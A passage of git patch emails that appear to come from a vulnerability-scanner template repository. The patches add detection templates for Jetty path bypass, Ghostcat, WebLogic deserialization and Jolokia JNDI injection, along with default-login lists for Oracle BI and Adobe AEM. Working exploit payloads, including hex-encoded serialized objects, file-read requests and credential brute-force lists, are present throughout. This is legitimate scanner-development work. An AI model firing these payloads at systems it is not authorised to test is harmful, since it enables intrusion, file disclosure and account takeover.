https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 tags: cve,cve2021,jetty requests: From 1299ae621fd719b162c769226d5cd09ee948de87 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:39:19 +0530 Subject: [PATCH 0025/4083] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index 975bab47cf..6c5d5c88ba 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,7 +1,7 @@ id: CVE-2021-28164 info: - name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + name: Authorization Before Parsing and Canonicalization in jetty author: noamrathaus severity: high description: | From ccdb667d3bf392a482f9bed151a0dde9ade601a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:42:14 +0530 Subject: [PATCH 0026/4083] YML to YAML --- cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} (100%) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yaml similarity index 100% rename from cves/2021/CVE-2021-28164.yml rename to cves/2021/CVE-2021-28164.yaml From feb42e49b092f111193fb02e69587abe4f66c623 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 09:53:47 +0300 Subject: [PATCH 0027/4083] Reduce chances of FP --- vulnerabilities/other/maian-cart-preauth-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 6888e6a4f2..3290e2d7fd 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -55,4 +55,5 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_3, "{{randstr_1}}")' + - "status_code_3 == 200" \ No newline at end of file From 3369c5a4dd5a6bf63036b09cf8a22a5187568e92 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 11:55:20 +0300 Subject: [PATCH 0028/4083] Reference --- vulnerabilities/other/ns-asg-file-read.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 66e112d2de..2f34341723 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -4,6 +4,7 @@ info: name: NS ASG Arbitrary File Read author: pikpikcu severity: high + reference: https://zhuanlan.zhihu.com/p/368054963 tags: nsasg,lfi requests: From e8e5dd5c83a24a54dcf97d4b34e314ff2b6384e9 Mon Sep 17 00:00:00 2001 From: Keith Date: Sat, 19 Jun 2021 21:59:42 +0800 Subject: [PATCH 0029/4083] add CVE-2020-1938.yaml - Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability --- cves/2020/CVE-2020-1938.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 cves/2020/CVE-2020-1938.yaml diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml new file mode 100644 index 0000000000..0454c76799 --- /dev/null +++ b/cves/2020/CVE-2020-1938.yaml @@ -0,0 +1,17 @@ +id: CVE-2020-1938 + +info: + name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability + author: milo2012 + severity: high + +network: + - inputs: + - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}" + host: + - "{{Hostname}}:8009" + read-size: 1024 + matchers: + - type: word + words: + - "See the NOTICE file distributed with" From 7c01e95ee15704f872834b40c3c1958177432c9a Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 05:35:36 +0800 Subject: [PATCH 0030/4083] add oracle-bi-default-credentials.yaml --- .../oracle/oracle-bi-default-credentials.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 default-logins/oracle/oracle-bi-default-credentials.yaml diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml new file mode 100644 index 0000000000..68af43ed4d --- /dev/null +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -0,0 +1,39 @@ +id: oracle-business-intelligence-default-credentials + +info: + name: Oracle Business Intelligence Default Credentials + author: milo2012 + severity: high + tags: oracle,business intelligence + +requests: + - raw: + - | + POST /xmlpserver/services/XMLPService HTTP/1.1 + Content-Type: text/xml + SOAPAction: "" + Cookie: JSESSIONID=rY0rMSBGerKQxDoGHdxkLZ7iLj3GgAjDzEfix5ntVX4bjctPXvbL!-387043440 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Encoding: gzip,deflate + Content-Length: 771 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 + Host: {{Hostname}} + Connection: Keep-alive + + + + + + Administrator + Administrator + XXX + + + + + + matchers: + - type: regex + regex: + - 'createSessionReturn' + part: body From af9019b71028e24190f0889e826a06e47fc1a933 Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 05:38:27 +0800 Subject: [PATCH 0031/4083] add oracle-bi-default-credentials.yaml --- default-logins/oracle/oracle-bi-default-credentials.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 68af43ed4d..496833ab02 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -31,7 +31,6 @@ requests: - matchers: - type: regex regex: From 435c16d1284930b182dc0330159aeaa3c7e6058a Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 05:41:25 +0800 Subject: [PATCH 0032/4083] add oracle-bi-default-credentials.yaml --- default-logins/oracle/oracle-bi-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 496833ab02..061b2323d4 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -29,7 +29,7 @@ requests: XXX - + matchers: - type: regex From 55b89115aad648e485f9a4587659cdf81caa0194 Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 06:24:33 +0800 Subject: [PATCH 0033/4083] add CVE-2018-2628 - Oracle WebLogic Server Deserialization RCE --- cves/2020/CVE-2018-2628.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2020/CVE-2018-2628.yaml diff --git a/cves/2020/CVE-2018-2628.yaml b/cves/2020/CVE-2018-2628.yaml new file mode 100644 index 0000000000..86406c71d4 --- /dev/null +++ b/cves/2020/CVE-2018-2628.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-2628 + +info: + name: Oracle WebLogic Server Deserialization RCE + author: milo2012 + severity: high + +network: + - inputs: + - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}" + read: 1024 + - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}" + read: 1024 + - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" + read: 1024 + host: + - "{{Hostname}}" + read-size: 1024 + matchers: + - type: regex + regex: + - "\\$Proxy[0-9]+" From 2df38f44de276110e78f9d264c96129ebbdbaa3a Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 15:59:23 +0800 Subject: [PATCH 0034/4083] update oracle-bi-default-credentials.yaml --- default-logins/oracle/oracle-bi-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 061b2323d4..e65ebeea81 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -19,7 +19,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 Host: {{Hostname}} Connection: Keep-alive - + @@ -30,7 +30,7 @@ requests: - + matchers: - type: regex regex: From 58505f9c8aace507fba8a585fa19eff4b25e5c61 Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 16:13:07 +0800 Subject: [PATCH 0035/4083] remove spaces --- default-logins/oracle/oracle-bi-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index e65ebeea81..18a0fd58db 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -30,7 +30,7 @@ requests: - + matchers: - type: regex regex: From d6e1678e18ee8d4663668dbd15a2996ac7f90a36 Mon Sep 17 00:00:00 2001 From: Keith Date: Mon, 21 Jun 2021 16:15:18 +0800 Subject: [PATCH 0036/4083] remove spaces --- default-logins/oracle/oracle-bi-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 18a0fd58db..1075930211 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -19,7 +19,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 Host: {{Hostname}} Connection: Keep-alive - + @@ -30,7 +30,7 @@ requests: - + matchers: - type: regex regex: From cb4d12cc8c9c70973e99d66e93dbab4dfaa938ef Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Jun 2021 14:20:20 +0530 Subject: [PATCH 0037/4083] Moved to cves/2018 --- cves/{2020 => 2018}/CVE-2018-2628.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/{2020 => 2018}/CVE-2018-2628.yaml (100%) diff --git a/cves/2020/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml similarity index 100% rename from cves/2020/CVE-2018-2628.yaml rename to cves/2018/CVE-2018-2628.yaml From be89aed331c8382545a300460415c07e1bbca4f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Jun 2021 14:26:53 +0530 Subject: [PATCH 0038/4083] Update CVE-2018-2628.yaml --- cves/2018/CVE-2018-2628.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 86406c71d4..613a0793b1 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml @@ -4,6 +4,8 @@ info: name: Oracle WebLogic Server Deserialization RCE author: milo2012 severity: high + reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 + tags: cve,cve2018,oracle,weblogic network: - inputs: From 592b2e72226671119e21549e6af2777e81d9e9c4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Jun 2021 14:28:51 +0530 Subject: [PATCH 0039/4083] Update CVE-2020-1938.yaml --- cves/2020/CVE-2020-1938.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index 0454c76799..b09a48519c 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml @@ -4,6 +4,8 @@ info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 severity: high + reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 + tags: cve,cve2020,apache,tomcat,lfi network: - inputs: From d51a72ebf448e696f857a943178545360c0e721b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Jun 2021 14:29:42 +0530 Subject: [PATCH 0040/4083] Update oracle-bi-default-credentials.yaml --- default-logins/oracle/oracle-bi-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 1075930211..33fc346e55 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -4,7 +4,7 @@ info: name: Oracle Business Intelligence Default Credentials author: milo2012 severity: high - tags: oracle,business intelligence + tags: oracle,dlogin requests: - raw: From e84dc0e94c155a6f3bdc7ca67a4ea1e5c968c80e Mon Sep 17 00:00:00 2001 From: Keith Date: Tue, 22 Jun 2021 20:32:30 +0800 Subject: [PATCH 0041/4083] Add CVE-2018-1000130.yaml - Jolokia Agent Proxy JNDI Code Injection --- cves/2018/CVE-2018-1000130.yaml | 40 +++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2018/CVE-2018-1000130.yaml diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml new file mode 100644 index 0000000000..f406b870e7 --- /dev/null +++ b/cves/2018/CVE-2018-1000130.yaml @@ -0,0 +1,40 @@ +id: CVE-2018-1000130 + +info: + name: Jolokia Agent Proxy JNDI Code Injection + author: milo2012 + severity: high + description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. + tags: cve,cve2018,jolokia,rce + +requests: + - raw: + - | + POST /jolokia/read/getDiagnosticOptions HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. + Accept-Language: en-GB,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + Content-Length: 167 + + { + "type" : "read", + "mbean" : "java.lang:type=Memory", + "target" : { + "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" + } + } + + matchers-condition: or + matchers: + - type: word + words: + - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389" + part: body + - type: status + status: + - 200 \ No newline at end of file From 139aaf2ecf33cd7dbb184c023f828db74d31306b Mon Sep 17 00:00:00 2001 From: Keith Date: Tue, 22 Jun 2021 20:35:17 +0800 Subject: [PATCH 0042/4083] Add CVE-2018-1000130.yaml - fix spaces --- cves/2018/CVE-2018-1000130.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index f406b870e7..ee91f25d0f 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -24,9 +24,9 @@ requests: { "type" : "read", "mbean" : "java.lang:type=Memory", - "target" : { + "target" : { "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" - } + } } matchers-condition: or From 6e139881eea193e9f18ad4b5d8b4892ee7bcd979 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 23 Jun 2021 00:33:06 +0800 Subject: [PATCH 0043/4083] fix or operator --- cves/2018/CVE-2018-1000130.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index ee91f25d0f..e00ef15315 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -29,7 +29,7 @@ requests: } } - matchers-condition: or + matchers-condition: and matchers: - type: word words: @@ -37,4 +37,4 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 From 916ea5ff728d5d8388869dfd510237d61194dd93 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 23 Jun 2021 01:29:08 +0800 Subject: [PATCH 0044/4083] Add CVE-2019-3401 - Atlassian JIRA Information Exposure (CVE-2019-3401) --- cves/2019/CVE-2019-3401.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 cves/2019/CVE-2019-3401.yaml diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml new file mode 100644 index 0000000000..228b23a35b --- /dev/null +++ b/cves/2019/CVE-2019-3401.yaml @@ -0,0 +1,16 @@ +id: CVE-2019-3401 + +info: + name: Atlassian JIRA Information Exposure (CVE-2019-3401) + author: milo2012 + severity: low + tags: cve,cve2019,jira + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ManageFilters.jspa" + matchers: + - type: word + words: + - '' From f48d1d8b3524845eda6042ae3900ba42cddda4e4 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 23 Jun 2021 01:43:31 +0800 Subject: [PATCH 0045/4083] Add jolokia-heap-info-disclosure.yaml --- .../jolokia/jolokia-heap-info-disclosure.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml new file mode 100644 index 0000000000..762d0bf814 --- /dev/null +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -0,0 +1,34 @@ +id: jolokia-heap-info-disclosure + +info: + name: Jolokia Java Heap Information Disclosure + author: milo2012 + severity: info + tags: jolokia + +requests: + - raw: + - | + POST /jolokia/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. + Accept-Language: en-GB,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + Content-Length: 136 + + { + "type":"EXEC", + "mbean":"com.sun.management:type=HotSpotDiagnostic", + "operation":"dumpHeap", + "arguments":["/tmp1234/test1.hprof",0] + } + + matchers: + - type: word + words: + - 'stacktrace":"java.io.IOException: No such file or directory' + part: body \ No newline at end of file From 5e9847260a91280184a3e6fac337bf4f8beee9bf Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 23 Jun 2021 01:46:57 +0800 Subject: [PATCH 0046/4083] remove trailing spaces --- vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 762d0bf814..050597b3a5 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -1,7 +1,7 @@ id: jolokia-heap-info-disclosure info: - name: Jolokia Java Heap Information Disclosure + name: Jolokia Java Heap Information Disclosure author: milo2012 severity: info tags: jolokia @@ -31,4 +31,4 @@ requests: - type: word words: - 'stacktrace":"java.io.IOException: No such file or directory' - part: body \ No newline at end of file + part: body From 34b611d9614b91c6cb405cfd39465bee8e721fa2 Mon Sep 17 00:00:00 2001 From: Robert Wiggins <51722811+RandomRobbieBF@users.noreply.github.com> Date: Wed, 23 Jun 2021 09:04:06 +0100 Subject: [PATCH 0047/4083] Create adobe-aem-default-credentials.yaml --- .../aem/adobe-aem-default-credentials.yaml | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 default-logins/aem/adobe-aem-default-credentials.yaml diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml new file mode 100644 index 0000000000..6dbc3a84d3 --- /dev/null +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -0,0 +1,65 @@ +id: adobe-aem-default-credentials + +info: + name: Adobe AEM Default Credentials + author: random-robbie + severity: critical + tags: aem,default-login + reference: + +requests: + + - payloads: + + rr_username: + - admin + - grios + - replication-receiver + - vgnadmin + - aparker@geometrixx.info + - jdoe@geometrixx.info + - james.devore@spambob.com + - matt.monroe@mailinator.com + - aaron.mcdonald@mailinator.com + - jason.werner@dodgit.com + + rr_password: + - admin + - password + - replication-receiver + - vgnadmin + - aparker + - jdoe + - password + - password + - password + - password + + attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + + raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + part: header + words: + - crx From 18796b5bba2b607603449bf868f39d91db79063e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 00:40:11 +0530 Subject: [PATCH 0049/4083] Update adobe-aem-default-credentials.yaml --- default-logins/aem/adobe-aem-default-credentials.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6dbc3a84d3..2ec85a21ac 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -5,12 +5,12 @@ info: author: random-robbie severity: critical tags: aem,default-login - reference: + reference: requests: - payloads: - + rr_username: - admin - grios @@ -36,7 +36,7 @@ requests: - password attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb - + raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -52,7 +52,7 @@ requests: Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true - + matchers-condition: and matchers: - type: status From cc0dd04ac24e07eab3859581571455eb30de7e3b Mon Sep 17 00:00:00 2001 From: 